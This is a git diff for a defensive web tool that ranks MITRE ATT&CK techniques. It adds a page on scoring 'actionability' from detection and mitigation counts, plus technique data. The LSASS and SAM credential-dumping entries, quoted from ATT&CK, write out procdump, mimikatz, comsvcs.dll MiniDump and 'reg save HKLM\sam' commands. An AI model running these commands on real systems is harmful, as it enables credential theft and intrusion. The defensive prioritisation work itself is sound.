zw>uF5d=j@!f65B>Pba8sYU<~|TBz{+oZj3ey|5i9Nkkm7@Pa-bq-Qz)V(0=M4v@x?
zDA}?Mc6ZY^m#BPkVcW>I)HeSc_haFo05*T-rQ7`5)0?CxX8Lb*hVr6vjFO+9_h3gL
zFii=Ayrkw_{*VGF@pR3}5J12Co-zcOARCVT8WzHl0lKEcn|-pQAc~!uK8ls?LeJVP
zni@VZgL9O#pIqPm@JVQqw;Ycl_)WB>Msh}F^dkGKgTsGZJ3{igRzePF1>~_S5!|PA
zI0Vt5MaCG@6y9pw5Wz)7--k!wNP@Nh74$#2kwL_%M4o&TE^ueFA`szMC?}TXFIZ61
zq|)gCkat?A0FiXowez(4b#~VOrn0oC*8n#}H<2LEd|OQZ%?ex+dU)@K|6g#3FY0ep
z(Hycu0%@InN`n&oyXZYXz?$%_f4@9FV_Ct~@C-cvEZRUc|DPtIg}=uiwsImETJ7k%
zTc=fYcw?{pr}YB}k=5w#U!{}ZU%KbdiCsf+1|OA!Daz@2MR(zkDsrz+6uGsu*@=l|
ztq@o4B{8Rt>|%D@g(jQyoGzZudP(%7@84D2kal{{9MnKunLt+C1HvM1uum_Y|FQWvQ_ip*#>p!p3VNAK3
z6F;v)?EexpUy9S7W0Wr
Why we include actionability

+    
It’s important to understand how a defender can take action to protect themselves against a specific
+        technique. Depending on the number of publicly available detections and mitigations per technique, this
+        allows the defender the ability respond to an incident faster, or to prevent the incident all together.
+    

+    
Finding Actionability

+    
We broke down actionability into two categories: detections and mitigations. 

+    
For detections, we reviewed several publicly available analytic resources and mapped each of them to
+        ATT&CK. The repositories we used were MITRE’s Cyber
+            Analytic Repository, Elastic,
+        Sigma HQ's
+            rules, and Splunk
+            Detections.
+
+    

+    
For mitigations, we reviewed security controls from two publicly available repositories and mapped each
+        of them to ATT&CK. The repositories we used were CIS Critical Security Controls and NIST 800-53 Security
+            Controls.
+    

+    
We then made a total count of all detections and mitigations available for each ATT&CK technique.
+        Techniques that have a greater number of detections and mitigations are weighted more heavily than those
+        with a lower number. If a technique has a limited number of ways to detect or protect against it, we
+        believe defending against those techniques will provide diminishing returns and more attention should be
+        placed elsewhere.

+    
For instance, T1014: Rootkit has
+        zero detections or mitigations in the repositories that we referenced.
+        Since rootkits are better identified by heuristics and forensics than analytics and security controls, a
+        disproportionate number of resources would need to be used to detect or prevent against them. Those
+        resources could be better allocated to defending against techniques that are more easily detected, but
+        just as dangerous.

+    
There are a few limitations to this methodology. First, we did not search each repository to see if each
+        analytic or control was still valid or if there were duplicates. Second, we did not differentiate for
+        analytics that are similarly related. For instance, an analytic looking for Powershell executing an
+        encoded command and one for Powershell executing Mimikatz would both count for T1053 (command and
+        scripting interpreter). We tried to account for these limitations by setting upper bounds. After a
+        certain point, the value of each additional analytic and control does not provide the same value to the
+        defender. Because of this, any detections and controls over 100 and 55, respectively, do not change the
+        weighted list.

+    
Finally, we recognize that for some, defending against rootkits, or other similarly stealthy techniques,
+        is just as, if not more, important than other techniques. We tried to account for this by allowing users
+        to choose which analytics and controls should be included in the weighted list.

+    

+        Scatterplot mapping number of detections on the x axis and number of mitigations on the y axis. Each point represents a single technique. The majority of techniques are below 20 detections and under 30 mitigations, but there are about 20 outliers. 
+    

+    
You can see there are quite a few outliers, especially for detections. Keep in mind that there are known
+        to be duplicates, so there is likely some double counting.

+
+    
Framing the Analysis

+    
This approach is based on techniques for "Multiple-criteria decision-making."

+    
Attribute Utilities

+    
Each technique has two attributes for determining actionability: the number of available detections, and
+        the number of available mitigations. In order to combine them into a single score, we'll need to
+        normalize using a "utility" function $u$ for each of these attributes. This will map the value of an
+        attribute to a number between 0 and 1 which indicates how much that value contributes to actionability.
+    

+    
For simplicity and interpretability, we recommend using a piecewise linear utility function, like this:
+    

+    
$$ {{ formula1 }} $$

+
+    
Here, $ x $ is the value of some attribute (ex: # mitigations), $ upper $ and $ lower $
+        are the upper and lower "cutoffs" for that attribute. Values below the lower cutoff have zero
+        utility,
+        values above the upper cutoff have maximum utility.

+
+    
For example, if 130 detection methods are not much more "valuable" than 100, then we may consider
+        specifying an upper cutoff of 100 for detections. Conversely, if 10 detection methods aren't much
+        more
+        valuable than 0 methods then we might set the lower cutoff to be 10. Moreover, using cutoffs like
+        this
+        will prevent cases where a technique has a very large number of detections but absolutely no
+        mitigations
+        might still get a high actionability score.
+    

+    
[notes: upper cutoff should be no larger than the largest value for its attribute, and lower cutoff
+        should
+        be no lower than the smallest value for its attribute]

+    
Bottom line: For each attribute (# detections and # mitigations), set the lower cutoff to the
+        smallest
+        value that "usefully" contributes to actionability (default to the lowest value), and set the upper
+        cutoff to the largest value that "usefully" contributes to actionability (default to something close
+        to
+        the largest value).

+    
 These cutoffs need to be specified for multiple reasons:

+    
    
+        
  • In order to combine mitigations and detections into a single function, they must both be on the
+            same
+            scale. If we were to scale them according to the smallest and largest values for each, then the
+            scaling would be determined by the (likely double-counted) outliers
    • 
+        
  • Prevent a technique with no mitigations but many detections from receiving an inflated
+            actionability
+            score
    • 
+        
  • Prevent the weighting from changing when new data (potentially a very large outlier) gets added
+        
    • 
+    

+    
For example scores, the cutoffs are 0 and 100 for detections, and 0 and 55 for mitigations.

+    
Examples of potential utility functions are illustrated below:

+    

+        line graph that visualizes different examples of the recommended piecewise utility function with lower and upper cutoffs used to normalize a technique's mitigation and detection score into a single number 
+    

+    
Defining Attribute Weighting

+    
We then define weights for each of the attributes to rank their importance. Once we have the weights
+        defined, the Actionability score is computed as:

+    
$$ {{ actionabilityScore }} $$

+
+    
 so in our case with number of detections and number of mitigations as our attributes, it will be:
+    

+    
$$ {{ actionabilityFormula }} $$

+    
Where $x_{d}$ and $ x_{m}$ are the raw counts of detections and mitigations, $ w_{d} $ and $ w_{m} $ are
+        their weights, and $u_{d} $ and $ u_{m} $ are their utility functions.
+    

+    
Since we are using utility functions, we need to be careful with how we define the weights.

+    
Bottom line: to make sure the weights have a "physical" meaning, we will define them using weighting
+        ratios

+    
$${{ formula2 }}$$

+    
If we want 1 mitigation to be worth 2 detections, then we'd set ${{ formula2 }}=2$. This method can
+        be extended to problems with more than two attributes.
+    

+    
How to Get Weights from Weighting Ratios

+    
The actionability formula is: ${{ actionabilityFormula }}$. If ${{ formula3 }}$ and ${{ formula4 }}$
+        (i.e. they are both in the main "linear domain") then we can write this as:
+    

+    
$$ {{ formula5 }} $$

+    
If we want each mitigation to be worth two detections, then we should set the $ w_{m} $ and $ w_{d} $
+        so that the following relation is satisfied (if the ratio is changed, then you would change the 2
+        here to whatever the new ratio is): ${{ formula6 }}$. The derivatives of A
+        are: 

+    
${{ formula7 }}$ and ${{ formula8 }}$ 

+
+    
 When we plug these into the above relation, we see that the relation to be satisfied becomes
+        ${{ formula9 }}$. So we can set ${{ formula10 }}$ and use the above relations to find a value for $
+        w_{d}
+        $.
+    

+    
${{ formula10 }}$ and ${{ formula11 }}$

+    
Then, to ensure actionability ranges from zero to one, we just need to normalize the weights so that they
+        add up to one (i.e. we want $ w'_{d} + w'_{m} = 1 $.) We can do this by dividing each un-normalized
+        weight by the sum of all weights: ${{ formula12 }}$ and ${{ formula13 }}$ where $w'_{m}$ and $w'_{d}$
+        are the values of $w_{m}$ and $w_{d}$ before normalizing.
+    

+
+    
What if we have more than two attributes?

+    
For actionability we may want to incorporate some weighting for the number of ATT&CK datasources each
+        technique has. Furthermore, this method might be used for one of the other scores, which may have
+        more
+        than two attributes. It is not too difficult to generalize this to work with three or more
+        attributes.
+    

+    
Suppose we have 5 attributes, named a, b, c, d, and e, and each attribute has an upper and lower
+        cutoff. The steps to defining their weights are:

+    
    
+        
  1. Make a "hierarchy" of attributes by importance
    2. 
+        
      
+            
    • Example: $e > [a,b] > d > c$
      • 
+        
    
+        
  2. For each "level", define the weighting ratios
    3. 
+        
      
+            
    • Example: ${{ formula14 }}$
      • 
+        
    
+        
  3. Set highest level's weights to 1 and use ratios to set the weights for the lower levels
+            according to ${{ formula15 }}$
+        
    4. 
+        
      
+            
    • Example: $w_{e} := 1$, then ${{ formula16 }}$ and ${{ formula17 }}$, etc.
      • 
+        
    
+        
  4. Adjust the weights with each attribute's cutoffs according to ${{ formula18 }}$
    5. 
+        
  5. Adjust so the weights add up to one
    6. 
+        
      
+            
    • Let $S = w_{a}+...+w_{e}$. Then, set $w_{a}:=w_{a}/S$,..., $w_{e}:=w_{e}/S$
      • 
+        
    
+    

+
+    
This is a contour plot of actionability scores -- patches of the same color have (roughly) the same
+        value
+        of actionability

+    
    
+        
  • Actionability ranges from zero to one. This will make things much easier when it comes time to
+            combine the scores from actionability, chokepoint and so on.
    • 
+        
  • You can see that the highest score that a technique with no mitigations can have is about 0.45
+        
    • 
+    

+    

+        scatterplot displaying number of detections on the x axis and number of mitigations on the y axis with actionability scores calculated from the actionability formula overlayed on top. Most techniques have an actionability score between 0 and 0.45
+    

+    
 Here's what actionability would look like if we didn't use utility functions to scale detections and
+        mitigations. We can see that actionability is now unbounded, which will make things difficult to combine
+        later on. Also, even if a technique has zero mitigations, it could still receive a high actionability
+        score if its detections is high enough.

+    

+        scatterplot displaying number of detections on the x axis and number of mitigations on the y axis with actionability scores overlayed on top. Since these scores have not been scaled with the utility function, actionability is unbounded and the highest value is 350 as opposed to 0. Most techniques have a score between o and 100.
+    

+
+
+
+
+
+
\ No newline at end of file
diff --git a/src/components/ChokePointSection.vue b/src/components/ChokePointSection.vue
new file mode 100644
index 0000000..b689a7c
--- /dev/null
+++ b/src/components/ChokePointSection.vue
@@ -0,0 +1,179 @@
+
+
+
+
\ No newline at end of file
diff --git a/src/components/MethodologySidebar.vue b/src/components/MethodologySidebar.vue
new file mode 100644
index 0000000..9d5d8dc
--- /dev/null
+++ b/src/components/MethodologySidebar.vue
@@ -0,0 +1,49 @@
+
+
+
+
+
\ No newline at end of file
diff --git a/src/components/PrevalenceSection.vue b/src/components/PrevalenceSection.vue
new file mode 100644
index 0000000..31715d0
--- /dev/null
+++ b/src/components/PrevalenceSection.vue
@@ -0,0 +1,139 @@
+
+
+
+
+
\ No newline at end of file
diff --git a/src/components/TopTenSidebar.vue b/src/components/TopTenSidebar.vue
index 84e6679..fbd2d48 100644
--- a/src/components/TopTenSidebar.vue
+++ b/src/components/TopTenSidebar.vue
@@ -1,15 +1,14 @@
 
 
 
 
-
+
diff --git a/src/components/SectionItem.vue b/src/components/SectionItem.vue
index d2c988e..ffcf1b6 100644
--- a/src/components/SectionItem.vue
+++ b/src/components/SectionItem.vue
@@ -9,7 +9,7 @@
     
{{ description }}

     
-      
Learn More

+      
{{ linkText }}

       
     
   
@@ -25,6 +25,10 @@ export default defineComponent({
     description: String,
     imgSrc: String,
     link: String,
+    linkText: {
+      type: String,
+      default: "Learn More"
+    }
   },
   data() {
     return {
diff --git a/src/components/SystemScoreSection.vue b/src/components/SystemScoreSection.vue
index 38df428..b23f457 100644
--- a/src/components/SystemScoreSection.vue
+++ b/src/components/SystemScoreSection.vue
@@ -7,18 +7,18 @@
         
     
     

-        

-            {{ getScoreText(monitoringType) }}
-            {{ monitoringType }} Monitoring
-        

-        

-            
+        

+            

+                {{ getScoreText(monitoringType) }}
+                {{ monitoringType }} Monitoring
+            

+            

                 {{ filter }}:
                 {{ getFilterText(filter) }}
-            
+            

         

-        
 
@@ -29,7 +28,8 @@ export default defineComponent({
         activeItemId: {
             type: Number,
             default: 0,
-        }
+        },
+        allowDelete: Boolean
     },
 });
 
diff --git a/src/components/TopTenWrapper.vue b/src/components/TopTenWrapper.vue
new file mode 100644
index 0000000..b154b7c
--- /dev/null
+++ b/src/components/TopTenWrapper.vue
@@ -0,0 +1,86 @@
+
+
+
+
+
diff --git a/src/data/Techniques.json b/src/data/Techniques.json
index 32c9144..1fe2baa 100644
--- a/src/data/Techniques.json
+++ b/src/data/Techniques.json
@@ -104,6 +104,165 @@
         "choke_point_score": 0.2,
         "prevalence_score": 0.01157747
     },
+    {
+        "tid": "T1001.001",
+        "name": "Data Obfuscation: Junk Data",
+        "description": "Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. ",
+        "url": "https://attack.mitre.org/techniques/T1001/001",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1001",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.18571428571428572,
+        "adjusted_score": 0.18571428571428572,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1001.002",
+        "name": "Data Obfuscation: Steganography",
+        "description": "Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. ",
+        "url": "https://attack.mitre.org/techniques/T1001/002",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1001",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.18571428571428572,
+        "adjusted_score": 0.18571428571428572,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1001.003",
+        "name": "Data Obfuscation: Protocol Impersonation",
+        "description": "Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.  \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. ",
+        "url": "https://attack.mitre.org/techniques/T1001/003",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1001",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.20476190476190476,
+        "adjusted_score": 0.20476190476190476,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
     {
         "tid": "T1003",
         "name": "OS Credential Dumping",
@@ -506,432 +665,716 @@
         "prevalence_score": 0.32699817
     },
     {
-        "tid": "T1005",
-        "name": "Data from Local System",
-        "description": "Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n",
-        "url": "https://attack.mitre.org/techniques/T1005",
+        "tid": "T1003.001",
+        "name": "OS Credential Dumping: LSASS Memory",
+        "description": "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n\n* procdump -ma lsass.exe lsass_dump\n\nLocally, mimikatz can be run using:\n\n* sekurlsa::Minidump lsassdump.dmp\n* sekurlsa::logonPasswords\n\nBuilt-in Windows tools such as comsvcs.dll can also be used:\n\n* rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump PID  lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)\n\n\nWindows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)\n\nThe following SSPs can be used to access credentials:\n\n* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\n* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)\n* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\n* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)\n",
+        "url": "https://attack.mitre.org/techniques/T1003/001",
         "tactics": [
-            "Collection"
+            "Credential Access"
         ],
-        "detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "detection": "Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "File: File Access",
-            "Script: Script Execution"
+            "Process: OS API Execution",
+            "Process: Process Access",
+            "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1003",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1057",
-                "name": "Data Loss Prevention",
-                "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
-                "url": "https://attack.mitre.org/mitigations/M1057"
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1043",
+                "name": "Credential Access Protection",
+                "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.",
+                "url": "https://attack.mitre.org/mitigations/M1043"
+            },
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1025",
+                "name": "Privileged Process Integrity",
+                "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.",
+                "url": "https://attack.mitre.org/mitigations/M1025"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
             }
         ],
-        "cumulative_score": 0.37409616142857144,
-        "adjusted_score": 0.37409616142857144,
-        "has_car": false,
+        "cumulative_score": 0.9095238095238095,
+        "adjusted_score": 0.9095238095238095,
+        "has_car": true,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": true,
-        "cis_controls": [],
+        "cis_controls": [
+            "2.6",
+            "4.1",
+            "4.7",
+            "4.8",
+            "5.2",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "14.1",
+            "14.3",
+            "16.1",
+            "16.9",
+            "18.3",
+            "18.5"
+        ],
         "nist_controls": [
             "AC-2",
             "AC-3",
+            "AC-4",
             "AC-5",
             "AC-6",
             "CA-7",
             "CM-2",
             "CM-5",
             "CM-6",
+            "CM-7",
             "IA-2",
             "IA-5",
             "SC-28",
+            "SC-3",
             "SC-39",
+            "SI-16",
+            "SI-2",
             "SI-3",
             "SI-4"
         ],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.17142857142857143,
-            "mitigation_score": 0.23636363636363636,
-            "detection_score": 0.1
-        },
-        "choke_point_score": 0.2,
-        "prevalence_score": 0.00266759
+        "hardware_coverage": false
     },
     {
-        "tid": "T1006",
-        "name": "Direct Volume Access",
-        "description": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)\n\nUtilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)",
-        "url": "https://attack.mitre.org/techniques/T1006",
+        "tid": "T1003.002",
+        "name": "OS Credential Dumping: Security Account Manager",
+        "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.\n\nA number of tools can be used to retrieve the SAM file through in-memory techniques:\n\n* pwdumpx.exe\n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n* secretsdump.py\n\nAlternatively, the SAM can be extracted from the Registry with Reg:\n\n* reg save HKLM\\sam sam\n* reg save HKLM\\system system\n\nCreddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)\n\nNotes: \n* RID 500 account is the local, built-in administrator.\n* RID 501 is the guest account.\n* User accounts start with a RID of 1,000+.\n",
+        "url": "https://attack.mitre.org/techniques/T1003/002",
         "tactics": [
-            "Defense Evasion"
+            "Credential Access"
         ],
-        "detection": "Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)\n\nMonitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1059/001), additional logging of PowerShell scripts is recommended.",
+        "detection": "Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.",
         "platforms": [
             "Windows"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "Drive: Drive Access"
+            "File: File Access",
+            "Windows Registry: Windows Registry Key Access"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1003",
         "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.10952380952380952,
-        "adjusted_score": 0.10952380952380952,
-        "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": false,
-        "cis_controls": [],
-        "nist_controls": [],
-        "process_coverage": true,
-        "network_coverage": false,
-        "file_coverage": false,
-        "cloud_coverage": false,
-        "hardware_coverage": true,
-        "actionability_score": {
-            "combined_score": 0.009523809523809523,
-            "detection_score": 0.02
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "mitigations": [
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.5904761904761905,
+        "adjusted_score": 0.5904761904761905,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "4.8",
+            "5.2",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "14.1",
+            "14.3",
+            "16.1",
+            "16.9",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "IA-5",
+            "SC-28",
+            "SC-39",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
     },
     {
-        "tid": "T1007",
-        "name": "System Service Discovery",
-        "description": "Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are \"sc,\" \"tasklist /svc\" using [Tasklist](https://attack.mitre.org/software/S0057), and \"net start\" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
-        "url": "https://attack.mitre.org/techniques/T1007",
+        "tid": "T1003.003",
+        "name": "OS Credential Dumping: NTDS",
